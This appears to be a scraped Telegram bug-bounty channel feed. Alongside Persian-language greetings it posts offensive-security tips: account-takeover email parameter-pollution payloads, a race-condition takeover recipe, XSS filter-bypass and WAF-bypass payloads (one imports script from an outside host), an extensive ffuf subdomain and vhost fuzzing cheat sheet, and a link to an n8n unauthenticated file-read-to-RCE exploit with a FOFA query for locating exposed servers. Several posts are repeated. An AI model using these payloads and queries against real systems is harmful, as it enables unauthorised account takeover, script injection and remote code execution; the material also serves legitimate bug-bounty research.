PDF generatorlarında SSRF
https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-pdf-generators-a-complete-guide-to-finding-ssrf-vulnerabilities-in-pdf-generators
⭐️ @RadvanSec
https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-pdf-generators-a-complete-guide-to-finding-ssrf-vulnerabilities-in-pdf-generators
⭐️ @RadvanSec
Intigriti
Exploiting PDF generators: A complete guide to finding SSRF vulnerabilities in PDF generators
PDF generators are commonly implemented in applications. Developers tend to use these components to generate documents based on dynamic data provided from the database for example. Unfortunately, not...
❤5
Forwarded from آرامش درونی
پدر یعنی:
ستونِ اطمینان؛
پناهی استوارکه تکیه میکنی
و هیچ هراسی از فرو ریختن نداری.
روز پدر بر همهی پدران زحمتکش و فداکار مبارک باد.
ستونِ اطمینان؛
پناهی استوارکه تکیه میکنی
و هیچ هراسی از فرو ریختن نداری.
روز پدر بر همهی پدران زحمتکش و فداکار مبارک باد.
❤🔥8
Yet another Account Takeover technique.✨
Seperator:
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
Array:
{"email":["victim@mail.com","hacker@mail.com"]}
#infosec #CyberSec #bugbountytips
⭐️ @RadvanSec
Seperator:
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
Array:
{"email":["victim@mail.com","hacker@mail.com"]}
#infosec #CyberSec #bugbountytips
⭐️ @RadvanSec
❤4
Race Condition to Account Takeover
1. User changes email:
POST /change-email → email=x@x(.com
2. Server sends confirmation link, but updates email before verification.
3. Attacker races the victim by claiming password reset for x@x(.com
⭐️ @RadvanSec
#Bugbountytips #BugBounty #CyberSecurity #infosec
#RadvanSec
1. User changes email:
POST /change-email → email=x@x(.com
2. Server sends confirmation link, but updates email before verification.
3. Attacker races the victim by claiming password reset for x@x(.com
⭐️ @RadvanSec
#Bugbountytips #BugBounty #CyberSecurity #infosec
#RadvanSec
❤5
Sharing my Burp Extension that earned me $200k in 2025 while API testing heavy JS-rich targets.
https://github.com/jenish-sojitra/JSAnalyzer
The tool helps find endpoints, files, internal emails, and some secrets from minified JS.
Its goal is to achieve maximum efficiency with reduced noise in results. Contributions and feedbacks are welcome.
⭐️ @RadvanSec
https://github.com/jenish-sojitra/JSAnalyzer
The tool helps find endpoints, files, internal emails, and some secrets from minified JS.
Its goal is to achieve maximum efficiency with reduced noise in results. Contributions and feedbacks are welcome.
⭐️ @RadvanSec
GitHub
GitHub - jenish-sojitra/JSAnalyzer
Contribute to jenish-sojitra/JSAnalyzer development by creating an account on GitHub.
❤2🔥1
🔎 #BugBountyTip Advanced Fuzzing Techniques Most Hunters Miss
0) Setup variables (optional)
DOMAIN="company.com"
ORIGIN="company.com" # or https://<cdn-origin> or https://<ip>
WL="words.txt"
HY="hybrid.txt"
1) Direct subdomain fuzz (fast check)
Works when DNS resolves the hostnames.
ffuf -w "$WL" -u "https://FUZZ.$DOMAIN/" -t 200 -mc 200,301,302,401,403 -fs 0 -ac
2) VHOST / Host-header fuzz (CDN / reverse proxy routing)
When wildcard DNS isn’t visible but routing exists.
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac
Save results (JSON)
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -of json -o vhost_fuzz.json -ac
3) Hyphenated hosts
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ-$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
4) Suffix & prefix environment tags
FUZZ-test.company.com
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ-test.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
test-FUZZ.company.com
ffuf -w "$WL" -u "$ORIGIN" -H "Host: test-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
FUZZ.stage.company.com
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.stage.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
stage-FUZZ.company.com
ffuf -w "$WL" -u "$ORIGIN" -H "Host: stage-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
5) WWW namespace exploitation (🔥)
FUZZwww.company.com
ffuf -w "$HY" -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
wwwFUZZ.company.com
ffuf -w "$HY" -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
wwFUZZ.company.com
ffuf -w "$HY" -u "$ORIGIN" -H "Host: wwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
FUZZww.company.com
ffuf -w "$HY" -u "$ORIGIN" -H "Host: FUZZww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
6) Numeric drift (use a numbers list)
Create a quick numbers list:
seq -w 0 500 > nums.txt
025www.company.com style
ffuf -w nums.txt -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
www02.company.com style
ffuf -w nums.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
www-03.company.com style
ffuf -w nums.txt -u "$ORIGIN" -H "Host: www-FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac
03-www.company.com style
ffuf -w nums.txt -u "$ORIGIN" -H "Host: FUZZ-www.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac
7) Separator drift (dot / hyphen / underscore / none)
underscore in DNS labels is uncommon but shows up in some internal/service records; test where allowed.
ffuf -w "$WL" -u "$ORIGIN" -H "Host: www-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
ffuf -w "$WL" -u "$ORIGIN" -H "Host: www_FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
ffuf -w "$WL" -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
8) Token fusion (role bleeding)
Use a curated list roles.txt like: api auth cdn static sso id app admin internal edge
ffuf -w roles.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
ffuf -w roles.txt -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
9) Third-party / vendor overlay
vendors.txt: jira confluence grafana kibana sentry datadog okta zendesk status
ffuf -w vendors.txt -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 200 -mc 200,301,302,401,403 -fs 0 -ac
ffuf -w vendors.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
10) Endpoint fuzzing (same mindset, different surface)
ffuf -w endpoints.txt -u "$ORIGIN/FUZZ" -t 200 -mc 200,204,301,302,401,403 -fc 404 -fs 0 -ac
With extensions
ffuf -w endpoints.txt -u "$ORIGIN/FUZZ" -e .php,.asp,.aspx,.jsp,.json,.txt,.bak,.zip -t 200 -mc 200,301,302,401,403 -fc 404 -fs 0 -ac
⭐️ @RadvanSec
0) Setup variables (optional)
DOMAIN="company.com"
ORIGIN="company.com" # or https://<cdn-origin> or https://<ip>
WL="words.txt"
HY="hybrid.txt"
1) Direct subdomain fuzz (fast check)
Works when DNS resolves the hostnames.
ffuf -w "$WL" -u "https://FUZZ.$DOMAIN/" -t 200 -mc 200,301,302,401,403 -fs 0 -ac
2) VHOST / Host-header fuzz (CDN / reverse proxy routing)
When wildcard DNS isn’t visible but routing exists.
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac
Save results (JSON)
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -of json -o vhost_fuzz.json -ac
3) Hyphenated hosts
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ-$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
4) Suffix & prefix environment tags
FUZZ-test.company.com
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ-test.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
test-FUZZ.company.com
ffuf -w "$WL" -u "$ORIGIN" -H "Host: test-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
FUZZ.stage.company.com
ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.stage.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
stage-FUZZ.company.com
ffuf -w "$WL" -u "$ORIGIN" -H "Host: stage-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
5) WWW namespace exploitation (🔥)
FUZZwww.company.com
ffuf -w "$HY" -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
wwwFUZZ.company.com
ffuf -w "$HY" -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
wwFUZZ.company.com
ffuf -w "$HY" -u "$ORIGIN" -H "Host: wwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
FUZZww.company.com
ffuf -w "$HY" -u "$ORIGIN" -H "Host: FUZZww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
6) Numeric drift (use a numbers list)
Create a quick numbers list:
seq -w 0 500 > nums.txt
025www.company.com style
ffuf -w nums.txt -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
www02.company.com style
ffuf -w nums.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac
www-03.company.com style
ffuf -w nums.txt -u "$ORIGIN" -H "Host: www-FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac
03-www.company.com style
ffuf -w nums.txt -u "$ORIGIN" -H "Host: FUZZ-www.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac
7) Separator drift (dot / hyphen / underscore / none)
underscore in DNS labels is uncommon but shows up in some internal/service records; test where allowed.
ffuf -w "$WL" -u "$ORIGIN" -H "Host: www-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
ffuf -w "$WL" -u "$ORIGIN" -H "Host: www_FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
ffuf -w "$WL" -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
8) Token fusion (role bleeding)
Use a curated list roles.txt like: api auth cdn static sso id app admin internal edge
ffuf -w roles.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
ffuf -w roles.txt -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
9) Third-party / vendor overlay
vendors.txt: jira confluence grafana kibana sentry datadog okta zendesk status
ffuf -w vendors.txt -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 200 -mc 200,301,302,401,403 -fs 0 -ac
ffuf -w vendors.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac
10) Endpoint fuzzing (same mindset, different surface)
ffuf -w endpoints.txt -u "$ORIGIN/FUZZ" -t 200 -mc 200,204,301,302,401,403 -fc 404 -fs 0 -ac
With extensions
ffuf -w endpoints.txt -u "$ORIGIN/FUZZ" -e .php,.asp,.aspx,.jsp,.json,.txt,.bak,.zip -t 200 -mc 200,301,302,401,403 -fc 404 -fs 0 -ac
⭐️ @RadvanSec
👍4
Forwarded from GO-TO CVE
با عرض سلام خدمت همهی عزیزان
علیرغم وجود اسکمها و مشکلات متعدد در برخی برنامههای باگبانتی ایرانی و خارجی، تصمیم گرفتم این کانال رو راهاندازی کنم تا بتونیم تجربههای واقعی بچه های امنیت کار رو از همکاری با این برنامهها در یکجا جمعآوری کنم.
هدف من و ادمین های عزیز اینه که بعد از بررسی و اطمینان از صحت گزارشها، اونها رو در اختیار عموم قرار بدیم تا سایر دوستان وقت، انرژی و تخصصشون رو بیدلیل تلف نکنن و بتونن آگاهانهتر وارد این حوزه یا کار روی برنامه خاصی بشن .
این کانال متعلق به همهی شماست — جایی برای شفافیت، تجربهمحوری و حمایت از جامعه امنیتی کشور. ⚡️
https://news.1rj.ru/str/bugbountyfeedback
علیرغم وجود اسکمها و مشکلات متعدد در برخی برنامههای باگبانتی ایرانی و خارجی، تصمیم گرفتم این کانال رو راهاندازی کنم تا بتونیم تجربههای واقعی بچه های امنیت کار رو از همکاری با این برنامهها در یکجا جمعآوری کنم.
هدف من و ادمین های عزیز اینه که بعد از بررسی و اطمینان از صحت گزارشها، اونها رو در اختیار عموم قرار بدیم تا سایر دوستان وقت، انرژی و تخصصشون رو بیدلیل تلف نکنن و بتونن آگاهانهتر وارد این حوزه یا کار روی برنامه خاصی بشن .
این کانال متعلق به همهی شماست — جایی برای شفافیت، تجربهمحوری و حمایت از جامعه امنیتی کشور. ⚡️
https://news.1rj.ru/str/bugbountyfeedback
Telegram
BugBountyFeedback
در این کانال از پلتفورم ها و برنامه هایی که کار کردیم و به هر دلیلی پول عزیزان باگ هانتر را ندادند مینویسم .
👎3
Found an XSS bypass during a bug bounty:
Backend was only stripping quotes ("), so payload like:
<s"vg o"nload=al"ert() />
turns into a valid:
<noscript onload=alert()>
🚨 Never rely on poor input filtering!
#BugBounty #CyberSecurity
⭐️ @RadvanSec
Backend was only stripping quotes ("), so payload like:
<s"vg o"nload=al"ert() />
turns into a valid:
<noscript onload=alert()>
🚨 Never rely on poor input filtering!
#BugBounty #CyberSecurity
⭐️ @RadvanSec
❤2👍2🔥1
https://portswigger.net/research/top-10-web-hacking-techniques-of-2025-nominations-open
⭐️ @RadvanSec
⭐️ @RadvanSec
PortSwigger Research
Top 10 web hacking techniques of 2025: call for nominations
Over the last year, security researchers have shared a huge amount of work with the community through blog posts, presentations, and whitepapers. This is great, but it also means genuinely reusable te
❤4🔥1
#Bypass Imperva, Akamai and CloudFlare WAF
=> Prepend with 50 chars then use
1"><A HRef=%26quot AutoFocus OnFocus%0C={import(/https:X55.is/.source)}>
PoC: x55.is/brutelogic/xss…
⭐️ @RadvanSec
=> Prepend with 50 chars then use
1"><A HRef=%26quot AutoFocus OnFocus%0C={import(/https:X55.is/.source)}>
PoC: x55.is/brutelogic/xss…
⭐️ @RadvanSec
❤3🔥1
Forwarded from محمد نصیری | بنیانگذار انجمن تخصصی فناوری اطلاعات ایران
روزهای خیلی خوبی میاد … شک نکنید
❤11❤🔥1🔥1
CVE-2026-21858.yaml
1.8 KB
n8n Ni8mare - Unauthenticated Arbitrary File Read to RCE Chain
https://github.com/Chocapikk/CVE-2026-21858
⭐️ @RadvanSec
https://github.com/Chocapikk/CVE-2026-21858
fofa:icon_hash="-831756631"
⭐️ @RadvanSec
👍5❤1🔥1